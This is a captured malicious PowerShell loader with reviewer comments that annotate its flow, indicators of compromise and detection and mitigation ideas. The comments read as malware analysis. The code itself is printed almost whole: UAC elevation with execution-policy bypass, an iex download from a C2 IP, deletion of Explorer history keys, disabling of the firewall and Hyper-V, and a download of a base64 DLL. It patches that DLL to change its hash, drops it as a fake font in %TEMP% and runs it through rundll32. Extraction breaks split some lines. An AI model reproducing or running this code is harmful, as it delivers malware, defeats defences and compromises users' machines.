
Messagehshshsh

The script checks for administrator privileges and restarts itself with elevated permissions if necessary. It removes specific registry keys, disables firewall profiles, and attempts to download a file from a specified link, handling errors with fallbacks. Finally, it writes the downloaded content to a file and executes it using rundll32.exe.


The script checks for administrator privileges and restarts itself with elevated permissions if necessary. It removes specific registry keys, disables firewall profiles, and attempts to download a file from a specified link, handling errors with fallbacks. Finally, it writes the downloaded content to a file and executes it using rundll32.exe.


# NOTE(review): Malicious PowerShell loader as captured from a document-sharing
# site. Several statements are split across lines mid-token by the text
# extraction (e.g. "-" / "ForegroundColor", "Microsoft-Hyper-V-" / "Hypervisor",
# "-" / "Command"), so the text exactly as shown does not parse; the comments
# below annotate the intended flow for analysis and detection purposes only.
# The "2.zoppoz.workers.dev:443/" prefix on every URL looks like a capture-time
# proxy rewrite rather than part of the original sample - treat the host and
# path after it as the indicator.
#
# Behaviour summary (as established by the code below):
#   1. Checks for Administrator; if not elevated, relaunches itself via
#      -Verb RunAs with -ExecutionPolicy Bypass, re-fetching its own body from
#      211.101.237.147:9699/se.php when it is running file-less (no $PSCommandPath).
#   2. Deletes Explorer RunMRU / RecentDocs / FeatureUsage / TypedPaths / ComDlg32
#      keys under HKCU (user-activity artefacts).
#   3. Disables all three Windows Firewall profiles and the Hyper-V hypervisor
#      optional feature; kills every rundll32 process.
#   4. Downloads a base64 payload from ghostbin.cloud/ideis/raw, overwrites a
#      16796-byte region at a 34-byte marker with random bytes, drops it as
#      %TEMP%\<yyyyMMddHHmmss><rnd>\<rnd>1.TTF and runs it with
#      rundll32.exe <file>,GO <marker string>.
#   5. Spawns a second powershell.exe to delete the on-disk script on most
#      failure paths (and after a file-based elevated relaunch).
# Indicators present on this page: 211.101.237.147:9699 (se.php?key=...),
# ghostbin.cloud/ideis/raw, vip.123yx.com/1844947338/20250106/rundll32,
# service name MessageTransfer, marker string SETK48F0106109DF0F7E2AE66A5D92D9.
# Mitigation angle: the final stage depends on rundll32.exe loading a DLL from a
# user-writable %TEMP% path - WDAC/AppLocker DLL rules that deny loads from
# user-writable directories, plus tamper-protected firewall settings, break it.

# --- Elevation check: relaunch elevated when not already Administrator -------
if (-not ([Security.Principal.

WindowsPrincipal]
[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.Wi
ndowsBuiltInRole] "Administrator")) {
Write-Host "Requires administrator privileges, restarting script..." -
ForegroundColor Yellow
# $PSCommandPath is empty when the script was piped into iex rather than run
# from a file. In that case it re-downloads itself from the C2 below, sending
# the marker string base64-encoded in the query string. The "1"/"2" prints mark
# which branch was taken.
if (-not $PSCommandPath) {
Write-Host "1" -ForegroundColor Yellow
$key = "SETK48F0106109DF0F7E2AE66A5D92D9"
$keyBytes = [System.Text.Encoding]::UTF8.GetBytes($key)
$encodedKey = [Convert]::ToBase64String($keyBytes)

# Detection: an unelevated powershell.exe spawning powershell with
# "-NoProfile -ExecutionPolicy Bypass -Command iex (irm http://...)" via
# -Verb RunAs (a UAC consent prompt is shown to the user).
$url = "http://211.101.237.147:9699/se.php?key=$encodedKey"
Start-Process -FilePath "powershell" -ArgumentList "-NoProfile -
ExecutionPolicy Bypass -Command `"iex (irm $url)`"" -Verb RunAs
} else {
# File-based run: relaunch the same file elevated, then start a second
# PowerShell that sleeps 1 s and deletes the original script (self-removal of
# the on-disk copy; the elevated child is already running by then).
Write-Host "2" -ForegroundColor Yellow
Start-Process -FilePath "powershell" -ArgumentList "-NoProfile -
ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
$scriptPath = $MyInvocation.MyCommand.Path
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-Command
Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow
}
Start-Sleep -Seconds 2
exit
}
# --- Everything below runs elevated -------------------------------------------
# Stops a service named MessageTransfer. What that service is (possibly an
# earlier installation of the payload) is not shown on this page - unconfirmed.
Stop-Service -Name MessageTransfer -ErrorAction SilentlyContinue
Start-Sleep -Seconds 2
# The marker string is echoed here and later handed to the payload as its
# argument; it reads like a campaign/build identifier (assumption, not stated).
Write-Host "SETK48F0106109DF0F7E2AE66A5D92D9" -ForegroundColor Green
Start-Sleep -Seconds 2
Write-Host "UAC" -ForegroundColor Green

# --- Anti-forensics: wipe Explorer user-activity artefacts --------------------
# RunMRU (Run dialog history), RecentDocs, FeatureUsage, TypedPaths (Explorer
# address-bar history) and ComDlg32 (Open/Save dialog history) are removed
# recursively, with errors suppressed. Detection: registry key deletions under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer for these names by
# powershell.exe (e.g. Sysmon Event ID 12).
$basePath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer"
$targetKeys = @("RunMRU", "RecentDocs","FeatureUsage","TypedPaths","ComDlg32")
Get-ChildItem -Path $basePath | ForEach-Object {
if ($targetKeys -contains $_.PSChildName) {
$targetPath = Join-Path -Path $basePath -ChildPath $_.PSChildName
Remove-Item -Path $targetPath -Recurse -Force -ErrorAction SilentlyContinue
}
}

# --- Defence impairment -------------------------------------------------------
# Process-scoped execution-policy bypass; the catch prefixes are arbitrary
# short labels ("cl", "fhq nook", "noHyper-V") rather than meaningful messages.
try {
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
} catch {
Write-Host "cl: $($_.Exception.Message)" -ForegroundColor Red
}
# All three firewall profiles are switched off. Detection/mitigation: alert on
# firewall profile state changes (Windows Firewall operational log, Security
# event 4950) and enforce firewall state centrally (GPO/MDM) so a local change
# is reverted.
try {
Set-NetFirewallProfile -Profile Public,Private,Domain -Enabled False
} catch {
Write-Host "fhq nook: $($_.Exception.Message)" -ForegroundColor Red
}
# Disables the Hyper-V hypervisor optional feature without rebooting (feature
# name is split across two lines by extraction). Likely aimed at
# virtualization-based protections (VBS/HVCI) taking effect after the next
# reboot - inferred from the feature name only, the script does not say.
try {
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-
Hypervisor -NoRestart
} catch {
Write-Host "noHyper-V: $($_.Exception.Message)" -ForegroundColor Red
}
# Force-kills every rundll32 process, 11 times in a row - presumably to clear
# a previous instance of the payload before it is relaunched below (inferred).
for ($i = 1; $i -le 11; $i++) {
Stop-Process -Name rundll32 -Force -ErrorAction SilentlyContinue
}

# --- Stage-2 download ---------------------------------------------------------
# The payload is hosted as base64 text on a public paste service.
$downloadLink = "https://ghostbin.cloud/ideis/raw"

# Dead branch: $downloadLink is hard-coded just above and is never empty, so
# this self-delete-and-exit path cannot be reached.
if (-not $downloadLink) {
Write-Host "No download link found." -ForegroundColor Red
Start-Sleep -Seconds 2
$scriptPath = $MyInvocation.MyCommand.Path
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-Command
Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow
exit
}
# Drop location: %TEMP%\<yyyyMMddHHmmss><random>\<random>1.TTF. The .TTF
# extension masquerades the DLL as a font file; rundll32 loads it regardless.
$randomDir = $env:TEMP + '\' + (Get-Date -Format "yyyyMMddHHmmss")+ (Get-Random)
$outFile = $randomDir + '\'+(Get-Random)+'1.TTF'
New-Item -Path $randomDir -ItemType Directory -Force

# Invoke-RestMethod first, curl as fallback; on total failure the script
# deletes its own file and exits.
try {
$base64EncodedContent = Invoke-RestMethod -Uri $downloadLink -ErrorAction Stop
} catch {
Write-Host "Failed to download the file using Invoke-RestMethod. Trying with
curl..." -ForegroundColor Red
try {
$base64EncodedContent = & curl -s $downloadLink
if (-not $base64EncodedContent) {
throw "File download failed using curl."
}
} catch {
Write-Host "Failed to download the file with curl: $($_.Exception.Message)"
-ForegroundColor Red
Start-Sleep -Seconds 2
$scriptPath = $MyInvocation.MyCommand.Path
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-Command
Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -NoNewWindow
exit
}
}

# --- Payload patching ---------------------------------------------------------
# Decodes the payload, does a naive linear scan for the 34-byte marker below
# and, if found, overwrites 16796 bytes starting at the marker with output of
# System.Random. Effect: each dropped file gets a fresh hash and the marker
# region no longer matches a static byte signature (purpose inferred from the
# code). Detection should therefore key on behaviour - rundll32 loading a
# .TTF from %TEMP% - rather than on the dropped file's hash.
$binaryContent = [Convert]::FromBase64String($base64EncodedContent)
$binaryData=$binaryContent
$pattern = [byte[]](0xD7, 0x97, 0x10, 0x00, 0xD7, 0x97, 0x10, 0x00, 0xD6, 0x97,
0x0F, 0x0A, 0xD9, 0x97, 0x11, 0x2D,
0xDB, 0x97, 0x12, 0x74, 0xDB, 0x96, 0x11, 0xA8, 0xDB, 0x96,
0x11, 0xD9, 0xDB, 0x96, 0x12, 0xFF, 0xDB, 0x96)
$replace_length = 16796
# -1 means "marker not found"; the file is then written unmodified.
$pos = -1
for ($i = 0; $i -le $binaryData.Length - $pattern.Length; $i++) {
$match = $true
for ($j = 0; $j -lt $pattern.Length; $j++) {
if ($binaryData[$i + $j] -ne $pattern[$j]) {
$match = $false
break
}
}
if ($match) {
$pos = $i
break
}
}
if ($pos -ge 0) {
$randomBytes = New-Object byte[] $replace_length
(New-Object Random).NextBytes($randomBytes)
# In-place overwrite; $binaryData and $binaryContent reference the same array,
# so the reassignment on the next-but-one line is a no-op.
[Array]::Copy($randomBytes, 0, $binaryData, $pos, $replace_length)
$binaryContent=$binaryData
} else {
# Chinese: "matching byte sequence not found".
Write-Output "未找到匹配字节序列"
}

# Writes the (possibly patched) DLL to the .TTF path in %TEMP%.
[System.IO.File]::WriteAllBytes($outFile, $binaryContent)

# --- Ensure a 32-bit rundll32.exe exists --------------------------------------
# If C:\Windows\SysWOW64\rundll32.exe is missing, a replacement is fetched from
# an external host and written straight into SysWOW64 (possible because the
# script is elevated). A PowerShell-written, unsigned file appearing in
# C:\Windows\SysWOW64 is a strong indicator by itself (e.g. Sysmon Event ID 11
# with powershell.exe as the creating process).
$FilePath = "C:\Windows\SysWOW64\rundll32.exe"
if (-Not (Test-Path $FilePath)) {
$rundll="https://vip.123yx.com/1844947338/20250106/rundll32"
Write-Host "rundll32.exe nofile: $FilePath"
try {
Invoke-WebRequest -Uri $rundll -OutFile $FilePath -ErrorAction Stop
} catch {
Write-Host "rundll32.exe Failed to download the file using Invoke-
WebRequest. Trying with curl..." -ForegroundColor Red
try {
Start-Process -FilePath "curl" -ArgumentList "-o `"$FilePath`"
`"$rundll`"" -NoNewWindow -Wait
if (-not (Test-Path $FilePath)) {
throw "rundll32.exe File download failed using curl."
}
} catch {
Write-Host "rundll32.exe Failed to download the file with curl: $
($_.Exception.Message)" -ForegroundColor Red
Start-Sleep -Seconds 2
$scriptPath = $MyInvocation.MyCommand.Path
$process = Start-Process -FilePath "powershell.exe" -ArgumentList "-
Command Start-Sleep -Seconds 1; Remove-Item -Path '$scriptPath' -Force" -
NoNewWindow
exit
}
}
}
Write-Host "File downloaded successfully to $outFile" -ForegroundColor Green

# --- Execution ----------------------------------------------------------------
# Loads the dropped .TTF as a DLL through rundll32.exe and calls its exported
# "GO" function with the marker string as argument (the argument string spans
# blank lines here - an extraction artefact). Detection: rundll32.exe whose
# command line names a file under %TEMP% with a non-.dll extension, or an
# export named GO (Sysmon Event ID 1 / 7).
Start-Process -FilePath "rundll32.exe" -ArgumentList "$outFile,GO


SETK48F0106109DF0F7E2AE66A5D92D9"
exit
